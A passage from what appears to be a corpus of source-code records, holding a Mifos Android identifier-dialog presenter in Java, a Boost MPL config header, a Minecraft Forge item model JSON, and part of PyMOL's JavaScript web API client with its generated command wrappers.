com.mifos.objects.noncore.IdentifierCreationResponse;\nimport com.mifos.objects.noncore.IdentifierPayload;\nimport com.mifos.objects.noncore.IdentifierTemplate;\nimport com.mifos.utils.MFErrorParser;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport retrofit2.adapter.rxjava.HttpException;\nimport rx.Observable;\nimport rx.Subscriber;\nimport rx.android.schedulers.AndroidSchedulers;\nimport rx.functions.Action1;\nimport rx.plugins.RxJavaPlugins;\nimport rx.schedulers.Schedulers;\nimport rx.subscriptions.CompositeSubscription;\n\n/**\n * Created by Rajan Maurya on 01/10/16.\n */\n\npublic class IdentifierDialogPresenter extends BasePresenter {\n\n private final DataManagerClient mDataManagerClient;\n private CompositeSubscription mSubscriptions;\n\n @Inject\n public IdentifierDialogPresenter(DataManagerClient dataManagerClient) {\n mDataManagerClient = dataManagerClient;\n mSubscriptions = new CompositeSubscription();\n }\n\n @Override\n public void attachView(IdentifierDialogMvpView mvpView) {\n super.attachView(mvpView);\n }\n\n @Override\n public void detachView() {\n super.detachView();\n mSubscriptions.clear();\n }\n\n public void loadClientIdentifierTemplate(int clientId) {\n checkViewAttached();\n getMvpView().showProgressbar(true);\n mSubscriptions.add(mDataManagerClient.getClientIdentifierTemplate(clientId)\n .observeOn(AndroidSchedulers.mainThread())\n .subscribeOn(Schedulers.io())\n .subscribe(new Subscriber() {\n @Override\n public void onCompleted() {\n }\n\n @Override\n public void onError(Throwable e) {\n getMvpView().showProgressbar(false);\n getMvpView().showError(R.string.failed_to_fetch_identifier_template);\n }\n\n @Override\n public void onNext(IdentifierTemplate identifierTemplate) {\n getMvpView().showProgressbar(false);\n getMvpView().showClientIdentifierTemplate(identifierTemplate);\n }\n })\n );\n }\n\n public void createClientIdentifier(int clientId, IdentifierPayload identifierPayload) {\n checkViewAttached();\n getMvpView().showProgressbar(true);\n mSubscriptions.add(mDataManagerClient.createClientIdentifier(clientId, identifierPayload)\n .observeOn(AndroidSchedulers.mainThread())\n .subscribeOn(Schedulers.io())\n .subscribe(new Subscriber() {\n @Override\n public void onCompleted() {\n }\n\n @Override\n public void onError(Throwable e) {\n getMvpView().showProgressbar(false);\n try {\n if (e instanceof HttpException) {\n String errorMessage = ((HttpException) e).response().errorBody()\n .string();\n getMvpView().showErrorMessage(MFErrorParser.parseError(errorMessage)\n .getErrors().get(0).getDefaultUserMessage());\n }\n } catch (Throwable throwable) {\n RxJavaPlugins.getInstance().getErrorHandler().handleError(e);\n }\n }\n\n @Override\n public void onNext(IdentifierCreationResponse identifierCreationResponse) {\n getMvpView().showProgressbar(false);\n getMvpView().showIdentifierCreatedSuccessfully(identifierCreationResponse);\n }\n })\n );\n }\n\n public List getIdentifierDocumentTypeNames(List documentTypes) {\n final ArrayList documentTypeList = new ArrayList<>();\n Observable.from(documentTypes)\n .subscribe(new Action1() {\n @Override\n public void call(DocumentType documentType) {\n documentTypeList.add(documentType.getName());\n }\n });\n return documentTypeList;\n }\n\n /**\n * Method to map Document Type with the corresponding name.\n * @param documentTypeList List of DocumentType\n * @return HashMap of \n */\n HashMap mapDocumentTypesWithName(List documentTypeList) {\n final HashMap hashMap = new HashMap<>();\n Observable.from(documentTypeList)\n .subscribe(new Action1() {\n @Override\n public void call(DocumentType documentType) {\n hashMap.put(documentType.getName(), documentType);\n }\n });\n return hashMap;\n }\n}\n"} {"text": "\n#ifndef BOOST_MPL_AUX_CONFIG_USE_PREPROCESSED_HPP_INCLUDED\n#define BOOST_MPL_AUX_CONFIG_USE_PREPROCESSED_HPP_INCLUDED\n\n// Copyright Aleksey Gurtovoy 2000-2004\n//\n// Distributed under the Boost Software License, Version 1.0. \n// (See accompanying file LICENSE_1_0.txt or copy at \n// http://www.boost.org/LICENSE_1_0.txt)\n//\n// See http://www.boost.org/libs/mpl for documentation.\n\n// $Id$\n// $Date$\n// $Revision$\n\n// #define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS\n\n#endif // BOOST_MPL_AUX_CONFIG_USE_PREPROCESSED_HPP_INCLUDED\n"} {"text": "{\n \"forge_marker\": 1,\n \"defaults\": {\n \"model\": \"builtin/generated\",\n \"transform\": \"forge:default-item\"\n },\n \"variants\": {\n \"variant\": {\n \"vehicle_upgrade_speed\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_speed\"\n }\n },\n \"vehicle_upgrade_aim\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_aim\"\n }\n },\n \"vehicle_upgrade_reload\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_reload\"\n }\n },\n \"vehicle_upgrade_power\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_power\"\n }\n },\n \"vehicle_upgrade_turret_pitch\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_turret_pitch\"\n }\n },\n \"vehicle_upgrade_pitch_up\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_pitch_up\"\n }\n },\n \"vehicle_upgrade_pitch_down\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_pitch_down\"\n }\n }\n }\n }\n}\n"} {"text": "// Copyright (C) Schrodinger, LLC, New York, NY.\n// All rights reserved. \n\nvar pymol_fn_counter = 0;\n\nfunction PyMOL(host, port, bufferMode, prefix) {\n\n this.Path = \"/apply?_json=\"; // URL path to pass json args to pymol\n\n // now using _underscore_names for internal attributes & methods\n\n this._cmd_buffer = [];\n\n // do we throw up visible alerts when exceptions occur?\n\n this._alerts = true;\n\n this._host = host;\n this._port = port;\n\n this._parseBufferMode = function (bufferMode) {\n if ((bufferMode != undefined) && (bufferMode == 'on')) {\n return 'on';\n } else {\n return 'off';\n }\n }\n this._bufferMode = this._parseBufferMode(bufferMode);\n\n if(prefix == undefined) {\n this._prefix = 'pymol'; // default remote object name\n } else {\n this._prefix = prefix;\n }\n\n try {\n xmlhttp = new XMLHttpRequest();\n } catch(e) {\n xmlhttp = new ActiveXObject(\"Microsoft.XMLHTTP\");\n }\n\n this.setBufferMode = function(bufferMode) {\n this._bufferMode = this._parseBufferMode(bufferMode);\n if (this._bufferMode == 'off') {\n this.flush();\n }\n }\n\n this.flush = function(callback) {\n if (this._cmd_buffer.length > 0) {\n var result = this._json('[' + this._cmd_buffer.join(',') + ']', callback);\n this._cmd_buffer.length = 0;\n return result;\n }\n }\n this.getBufferJSON = function() {\n return ('[' + this._cmd_buffer.join(',') + ']');\n }\n this.getBufferURL = function() {\n return (this.Path + '[' + this._cmd_buffer.join(',') + ']');\n }\n\n this._send_ajax = function(pypath, callback) {\n if (host == null) {\n myurl = pypath;\n } else {\n myurl = \"http://\" + host + \":\" + port + pypath;\n }\n if(myurl.length>2000) { /* some broswers can't handle long URLs */\n var part = myurl.split(\"?\",2);\n short_url = part[0];\n long_param = part[1];\n if (callback) {\n xmlhttp.open(\"POST\", short_url, true);\n xmlhttp.onreadystatechange = callback;\n } else {\n xmlhttp.open(\"POST\", short_url, false);\n }\n xmlhttp.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");\n xmlhttp.setRequestHeader(\"Content-length\", long_param.length);\n xmlhttp.setRequestHeader('Accept', 'text/json');\n xmlhttp.send(long_param);\n } else {\n if (callback) {\n xmlhttp.open(\"GET\", myurl, true);\n xmlhttp.onreadystatechange = callback;\n } else {\n xmlhttp.open(\"GET\", myurl, false);\n }\n xmlhttp.setRequestHeader('Accept', 'text/json');\n xmlhttp.send(null);\n }\n if (callback) {\n } else {\n if (xmlhttp.status == 500) {\n alert(\"PyMOL Exception:\\n\" + eval('(' + xmlhttp.responseText + ')').join(\"\\n\"));\n return null;\n } \n return eval('(' + xmlhttp.responseText + ')');\n }\n return false;\n }\n \n this._send_cross_script = function(pypath, callback) {\n if (host == null) {\n myurl = pypath;\n } else {\n myurl = \"http://\" + host + \":\" + port + pypath;\n }\n if (callback == undefined) {\n //myurl += \"&_callback=alert\"\n myurl += \"&_callback=void\"\n } else {\n // IE does not have callback.name, so we invent a unique one\n // and store it in the \"global\" namespace, window. In this way,\n // the javascript callback from our cross-domain script hack\n // contains a javascript function name known to this page/window.\n if (callback.name == undefined) {\n callback.name = '_fn' + pymol_fn_counter++;\n window[ callback.name ] = callback;\n } \n myurl += \"&_callback=\" + callback.name;\n }\n var head = document.getElementsByTagName(\"head\")[0];\n var script = document.createElement(\"script\");\n script.src = myurl;\n head.appendChild(script);\n return true;\n }\n\n this._send = function(pypath, callback) {\n if ( (host == null) || \n ((host == document.domain) && (port == document.location.port)) ) {\n return this._send_ajax(pypath, callback);\n } else {\n return this._send_cross_script(pypath, callback);\n }\n }\n \n this._handle_response = function(status, text) {\n response = JSON.parse(text);\n if(status == 200) { // normal result\n return response;\n } else { // some kind of error condition\n if(this._alerts) {\n alert(response.join(\"\\n\"));\n }\n return;\n }\n }\n\n this._result = function(e) {\n if ((host == document.domain) || (host == null)) {\n if (typeof e == \"object\") {\n // asynchronous ajax was used\n if (xmlhttp.readyState == 4) {\n return this._handle_response(xmlhttp.status, xmlhttp.responseText);\n return;\n }\n }\n // \"synchronous\" (no-callback) ajax was used\n if(xmlhttp.responseText) {\n return this._handle_response(xmlhttp.status, xmlhttp.responseText);\n } else {\n return;\n }\n } \n // e was provided by cross-script callback, so just return it\n return e;\n }\n\n // for private use\n this._json = function(jcmd,callback) {\n return this._send(this.Path+jcmd,callback);\n }\n // for public use; args switched to match style of pymol.cmd calls\n this.sendJSON = function(anyargs) {\n if (typeof arguments[0] == 'function') {\n //this.sendJSON = function(callback, jcmd) {\n callback = arguments[0];\n jcmd = arguments[1];\n } else {\n //this.sendJSON = function(jcmd) {\n callback = null;\n jcmd = arguments[0];\n }\n return this._send(this.Path+jcmd,callback);\n }\n\n this._apply = function(name, args, kwds, callback) {\n // note: javascript's 'this' can refer to either pymol or cmd\n if (name.substring(0,1) == '.') { // .cmd.method -> pymol.cmd.method\n name = this._prefix + name;\n }\n var mypath = this.Path;\n var myargs = '[\"' + name + '\"';\n if (args != null) {\n myargs = myargs + \",\" + JSON.stringify(args);\n if(kwds != null) {\n myargs = myargs + \",\" + JSON.stringify(kwds);\n }\n } else if(kwds != null) {\n myargs = myargs + \",[],\" + JSON.stringify(kwds)\n }\n myargs = myargs + \"]\";\n\n // document.getElementById('debug').innerHTML = mypath;\n\n if (this._bufferMode == 'on') {\n this._cmd_buffer.push(myargs);\n if ( callback ) {\n this.flush(callback);\n } else {\n return;\n }\n } else {\n return this._send(mypath+myargs,callback);\n }\n }\n\n this.apply_cmd = function(name, args, kwds, callback) {\n this._apply(\".cmd.\" + name, args, kwds, callback);\n }\n\n this.cmd = { // cmd is a public attribute of PyMOL instances\n \n _dispatch: function(anyargs) {\n // name is always first argument\n var name = \".cmd.\" + arguments[0];\n // callback function is optional second argument\n var callback = undefined;\n var argstart = 1;\n if (typeof arguments[1] == 'function') {\n callback = arguments[1];\n argstart = 2;\n }\n return this._outer._apply(name,Array.prototype.slice.apply(arguments).slice(argstart),null,callback);\n },\n\n // BEGIN MACHINE-GENERATED CODE\n // python webapi.py\n\n load: function() {\n return this._dispatch.apply(this,\n [\"load\"].concat(Array.prototype.slice.apply(arguments)));\n },\n load_traj: function() {\n return this._dispatch.apply(this,\n [\"load_traj\"].concat(Array.prototype.slice.apply(arguments)));\n },\n load_png: function() {\n return this._dispatch.apply(this,\n [\"load_png\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fragment: function() {\n return this._dispatch.apply(this,\n [\"fragment\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fetch: function() {\n return this._dispatch.apply(this,\n [\"fetch\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_mmodstr: function() {\n return this._dispatch.apply(this,\n [\"read_mmodstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_molstr: function() {\n return this._dispatch.apply(this,\n [\"read_molstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_sdfstr: function() {\n return this._dispatch.apply(this,\n [\"read_sdfstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_pdbstr: function() {\n return this._dispatch.apply(this,\n [\"read_pdbstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_xplorstr: function() {\n return this._dispatch.apply(this,\n [\"read_xplorstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_pdbstr: function() {\n return this._dispatch.apply(this,\n [\"get_pdbstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_fastastr: function() {\n return this._dispatch.apply(this,\n [\"get_fastastr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n copy: function() {\n return this._dispatch.apply(this,\n [\"copy\"].concat(Array.prototype.slice.apply(arguments)));\n },\n create: function() {\n return this._dispatch.apply(this,\n [\"create\"].concat(Array.prototype.slice.apply(arguments)));\n },\n extract: function() {\n return this._dispatch.apply(this,\n [\"extract\"].concat(Array.prototype.slice.apply(arguments)));\n },\n split_states: function() {\n return this._dispatch.apply(this,\n [\"split_states\"].concat(Array.prototype.slice.apply(arguments)));\n },\n symexp: function() {\n return this._dispatch.apply(this,\n [\"symexp\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ramp_new: function() {\n return this._dispatch.apply(this,\n [\"ramp_new\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_name: function() {\n return this._dispatch.apply(this,\n [\"set_name\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_new: function() {\n return this._dispatch.apply(this,\n [\"map_new\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_set: function() {\n return this._dispatch.apply(this,\n [\"map_set\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_set_border: function() {\n return this._dispatch.apply(this,\n [\"map_set_border\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_double: function() {\n return this._dispatch.apply(this,\n [\"map_double\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_halve: function() {\n return this._dispatch.apply(this,\n [\"map_halve\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_trim: function() {\n return this._dispatch.apply(this,\n [\"map_trim\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isodot: function() {\n return this._dispatch.apply(this,\n [\"isodot\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isolevel: function() {\n return this._dispatch.apply(this,\n [\"isolevel\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isomesh: function() {\n return this._dispatch.apply(this,\n [\"isomesh\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isosurface: function() {\n return this._dispatch.apply(this,\n [\"isosurface\"].concat(Array.prototype.slice.apply(arguments)));\n },\n slice_new: function() {\n return this._dispatch.apply(this,\n [\"slice_new\"].concat(Array.prototype.slice.apply(arguments)));\n },\n gradient: function() {\n return this._dispatch.apply(this,\n [\"gradient\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ungroup: function() {\n return this._dispatch.apply(this,\n [\"ungroup\"].concat(Array.prototype.slice.apply(arguments)));\n },\n group: function() {\n return this._dispatch.apply(this,\n [\"group\"].concat(Array.prototype.slice.apply(arguments)));\n },\n pseudoatom: function() {\n return this._dispatch.apply(this,\n [\"pseudoatom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fab: function() {\n return this._dispatch.apply(this,\n [\"fab\"].concat(Array.prototype.slice.apply(arguments)));\n },\n enable: function() {\n return this._dispatch.apply(this,\n [\"enable\"].concat(Array.prototype.slice.apply(arguments)));\n },\n disable: function() {\n return this._dispatch.apply(this,\n [\"disable\"].concat(Array.prototype.slice.apply(arguments)));\n },\n delete_: function() {\n return this._dispatch.apply(this,\n [\"delete_\"].concat(Array.prototype.slice.apply(arguments)));\n },\n reinitialize: function() {\n return this._dispatch.apply(this,\n [\"reinitialize\"].concat(Array.prototype.slice.apply(arguments)));\n },\n deselect: function() {\n return this._dispatch.apply(this,\n [\"deselect\"].concat(Array.prototype.slice.apply(arguments)));\n },\n select: function() {\n return this._dispatch.apply(this,\n [\"select\"].concat(Array.prototype.slice.apply(arguments)));\n },\n indicate: function() {\n return this._dispatch.apply(this,\n [\"indicate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n select_list: function() {\n return this._dispatch.apply(this,\n [\"select_list\"].concat(Array.prototype.slice.apply(arguments)));\n },\n pop: function() {\n return this._dispatch.apply(this,\n [\"pop\"].concat(Array.prototype.slice.apply(arguments)));\n },\n angle: function() {\n return this._dispatch.apply(this,\n [\"angle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n dihedral: function() {\n return this._dispatch.apply(this,\n [\"dihedral\"].concat(Array.prototype.slice.apply(arguments)));\n },\n dist: function() {\n return this._dispatch.apply(this,\n [\"dist\"].concat(Array.prototype.slice.apply(arguments)));\n },\n distance: function() {\n return this._dispatch.apply(this,\n [\"distance\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_angle: function() {\n return this._dispatch.apply(this,\n [\"get_angle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_dihedral: function() {\n return this._dispatch.apply(this,\n [\"get_dihedral\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_distance: function() {\n return this._dispatch.apply(this,\n [\"get_distance\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_area: function() {\n return this._dispatch.apply(this,\n [\"get_area\"].concat(Array.prototype.slice.apply(arguments)));\n },\n color: function() {\n return this._dispatch.apply(this,\n [\"color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n bg_color: function() {\n return this._dispatch.apply(this,\n [\"bg_color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rebuild: function() {\n return this._dispatch.apply(this,\n [\"rebuild\"].concat(Array.prototype.slice.apply(arguments)));\n },\n refresh: function() {\n return this._dispatch.apply(this,\n [\"refresh\"].concat(Array.prototype.slice.apply(arguments)));\n },\n recolor: function() {\n return this._dispatch.apply(this,\n [\"recolor\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_color: function() {\n return this._dispatch.apply(this,\n [\"set_color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_object_color: function() {\n return this._dispatch.apply(this,\n [\"set_object_color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n show: function() {\n return this._dispatch.apply(this,\n [\"show\"].concat(Array.prototype.slice.apply(arguments)));\n },\n show_as: function() {\n return this._dispatch.apply(this,\n [\"show_as\"].concat(Array.prototype.slice.apply(arguments)));\n },\n hide: function() {\n return this._dispatch.apply(this,\n [\"hide\"].concat(Array.prototype.slice.apply(arguments)));\n },\n cartoon: function() {\n return this._dispatch.apply(this,\n [\"cartoon\"].concat(Array.prototype.slice.apply(arguments)));\n },\n spectrum: function() {\n return this._dispatch.apply(this,\n [\"spectrum\"].concat(Array.prototype.slice.apply(arguments)));\n },\n center: function() {\n return this._dispatch.apply(this,\n [\"center\"].concat(Array.prototype.slice.apply(arguments)));\n },\n zoom: function() {\n return this._dispatch.apply(this,\n [\"zoom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n reset: function() {\n return this._dispatch.apply(this,\n [\"reset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n clip: function() {\n return this._dispatch.apply(this,\n [\"clip\"].concat(Array.prototype.slice.apply(arguments)));\n },\n orient: function() {\n return this._dispatch.apply(this,\n [\"orient\"].concat(Array.prototype.slice.apply(arguments)));\n },\n origin: function() {\n return this._dispatch.apply(this,\n [\"origin\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_view: function() {\n return this._dispatch.apply(this,\n [\"set_view\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_view: function() {\n return this._dispatch.apply(this,\n [\"get_view\"].concat(Array.prototype.slice.apply(arguments)));\n },\n move: function() {\n return this._dispatch.apply(this,\n [\"move\"].concat(Array.prototype.slice.apply(arguments)));\n },\n turn: function() {\n return this._dispatch.apply(this,\n [\"turn\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rock: function() {\n return this._dispatch.apply(this,\n [\"rock\"].concat(Array.prototype.slice.apply(arguments)));\n },\n stereo: function() {\n return this._dispatch.apply(this,\n [\"stereo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get: function() {\n return this._dispatch.apply(this,\n [\"get\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set: function() {\n return this._dispatch.apply(this,\n [\"set\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_bond: function() {\n return this._dispatch.apply(this,\n [\"set_bond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unset: function() {\n return this._dispatch.apply(this,\n [\"unset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unset_bond: function() {\n return this._dispatch.apply(this,\n [\"unset_bond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_boolean: function() {\n return this._dispatch.apply(this,\n [\"get_setting_boolean\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_int: function() {\n return this._dispatch.apply(this,\n [\"get_setting_int\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_float: function() {\n return this._dispatch.apply(this,\n [\"get_setting_float\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_legacy: function() {\n return this._dispatch.apply(this,\n [\"get_setting_legacy\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_tuple: function() {\n return this._dispatch.apply(this,\n [\"get_setting_tuple\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_text: function() {\n return this._dispatch.apply(this,\n [\"get_setting_text\"].concat(Array.prototype.slice.apply(arguments)));\n },\n window: function() {\n return this._dispatch.apply(this,\n [\"window\"].concat(Array.prototype.slice.apply(arguments)));\n },\n viewport: function() {\n return this._dispatch.apply(this,\n [\"viewport\"].concat(Array.prototype.slice.apply(arguments)));\n },\n full_screen: function() {\n return this._dispatch.apply(this,\n [\"full_screen\"].concat(Array.prototype.slice.apply(arguments)));\n },\n quit: function() {\n return this._dispatch.apply(this,\n [\"quit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n draw: function() {\n return this._dispatch.apply(this,\n [\"draw\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ray: function() {\n return this._dispatch.apply(this,\n [\"ray\"].concat(Array.prototype.slice.apply(arguments)));\n },\n align: function() {\n return this._dispatch.apply(this,\n [\"align\"].concat(Array.prototype.slice.apply(arguments)));\n },\n super_: function() {\n return this._dispatch.apply(this,\n [\"super_\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fit: function() {\n return this._dispatch.apply(this,\n [\"fit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rms: function() {\n return this._dispatch.apply(this,\n [\"rms\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rms_cur: function() {\n return this._dispatch.apply(this,\n [\"rms_cur\"].concat(Array.prototype.slice.apply(arguments)));\n },\n intra_fit: function() {\n return this._dispatch.apply(this,\n [\"intra_fit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n intra_rms: function() {\n return this._dispatch.apply(this,\n [\"intra_rms\"].concat(Array.prototype.slice.apply(arguments)));\n },\n intra_rms_cur: function() {\n return this._dispatch.apply(this,\n [\"intra_rms_cur\"].concat(Array.prototype.slice.apply(arguments)));\n },\n pair_fit: function() {\n return this._dispatch.apply(this,\n [\"pair_fit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n space: function() {\n return this._dispatch.apply(this,\n [\"space\"].concat(Array.prototype.slice.apply(arguments)));\n },\n order: function() {\n return this._dispatch.apply(this,\n [\"order\"].concat(Array.prototype.slice.apply(arguments)));\n },\n edit_mode: function() {\n return this._dispatch.apply(this,\n [\"edit_mode\"].concat(Array.prototype.slice.apply(arguments)));\n },\n button: function() {\n return this._dispatch.apply(this,\n [\"button\"].concat(Array.prototype.slice.apply(arguments)));\n },\n config_mouse: function() {\n return this._dispatch.apply(this,\n [\"config_mouse\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mouse: function() {\n return this._dispatch.apply(this,\n [\"mouse\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mask: function() {\n return this._dispatch.apply(this,\n [\"mask\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unmask: function() {\n return this._dispatch.apply(this,\n [\"unmask\"].concat(Array.prototype.slice.apply(arguments)));\n },\n count_atoms: function() {\n return this._dispatch.apply(this,\n [\"count_atoms\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_chains: function() {\n return this._dispatch.apply(this,\n [\"get_chains\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_color_index: function() {\n return this._dispatch.apply(this,\n [\"get_color_index\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_color_indices: function() {\n return this._dispatch.apply(this,\n [\"get_color_indices\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_object_color_index: function() {\n return this._dispatch.apply(this,\n [\"get_object_color_index\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_object_list: function() {\n return this._dispatch.apply(this,\n [\"get_object_list\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_color_tuple: function() {\n return this._dispatch.apply(this,\n [\"get_color_tuple\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_atom_coords: function() {\n return this._dispatch.apply(this,\n [\"get_atom_coords\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_extent: function() {\n return this._dispatch.apply(this,\n [\"get_extent\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_names: function() {\n return this._dispatch.apply(this,\n [\"get_names\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_names_of_type: function() {\n return this._dispatch.apply(this,\n [\"get_names_of_type\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_legal_name: function() {\n return this._dispatch.apply(this,\n [\"get_legal_name\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_unused_name: function() {\n return this._dispatch.apply(this,\n [\"get_unused_name\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_object_matrix: function() {\n return this._dispatch.apply(this,\n [\"get_object_matrix\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_phipsi: function() {\n return this._dispatch.apply(this,\n [\"get_phipsi\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_position: function() {\n return this._dispatch.apply(this,\n [\"get_position\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_raw_alignment: function() {\n return this._dispatch.apply(this,\n [\"get_raw_alignment\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_renderer: function() {\n return this._dispatch.apply(this,\n [\"get_renderer\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_symmetry: function() {\n return this._dispatch.apply(this,\n [\"get_symmetry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_title: function() {\n return this._dispatch.apply(this,\n [\"get_title\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_type: function() {\n return this._dispatch.apply(this,\n [\"get_type\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_version: function() {\n return this._dispatch.apply(this,\n [\"get_version\"].concat(Array.prototype.slice.apply(arguments)));\n },\n id_atom: function() {\n return this._dispatch.apply(this,\n [\"id_atom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n identify: function() {\n return this._dispatch.apply(this,\n [\"identify\"].concat(Array.prototype.slice.apply(arguments)));\n },\n index: function() {\n return this._dispatch.apply(this,\n [\"index\"].concat(Array.prototype.slice.apply(arguments)));\n },\n phi_psi: function() {\n return this._dispatch.apply(this,\n [\"phi_psi\"].concat(Array.prototype.slice.apply(arguments)));\n },\n matrix_copy: function() {\n return this._dispatch.apply(this,\n [\"matrix_copy\"].concat(Array.prototype.slice.apply(arguments)));\n },\n matrix_reset: function() {\n return this._dispatch.apply(this,\n [\"matrix_reset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rotate: function() {\n return this._dispatch.apply(this,\n [\"rotate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n translate: function() {\n return this._dispatch.apply(this,\n [\"translate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_object_ttt: function() {\n return this._dispatch.apply(this,\n [\"set_object_ttt\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_dihedral: function() {\n return this._dispatch.apply(this,\n [\"set_dihedral\"].concat(Array.prototype.slice.apply(arguments)));\n },\n transform_object: function() {\n return this._dispatch.apply(this,\n [\"transform_object\"].concat(Array.prototype.slice.apply(arguments)));\n },\n transform_selection: function() {\n return this._dispatch.apply(this,\n [\"transform_selection\"].concat(Array.prototype.slice.apply(arguments)));\n },\n translate_atom: function() {\n return this._dispatch.apply(this,\n [\"translate_atom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n update: function() {\n return this._dispatch.apply(this,\n [\"update\"].concat(Array.prototype.slice.apply(arguments)));\n },\n attach: function() {\n return this._dispatch.apply(this,\n [\"attach\"].concat(Array.prototype.slice.apply(arguments)));\n },\n bond: function() {\n return this._dispatch.apply(this,\n [\"bond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unbond: function() {\n return this._dispatch.apply(this,\n [\"unbond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n cycle_valence: function() {\n return this._dispatch.apply(this,\n [\"cycle_valence\"].concat(Array.prototype.slice.apply(arguments)));\n },\n drag: function() {\n return this._dispatch.apply(this,\n [\"drag\"].concat(Array.prototype.slice.apply(arguments)));\n },\n dss: function() {\n return this._dispatch.apply(this,\n [\"dss\"].concat(Array.prototype.slice.apply(arguments)));\n },\n edit: function() {\n return this._dispatch.apply(this,\n [\"edit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unpick: function() {\n return this._dispatch.apply(this,\n [\"unpick\"].concat(Array.prototype.slice.apply(arguments)));\n },\n 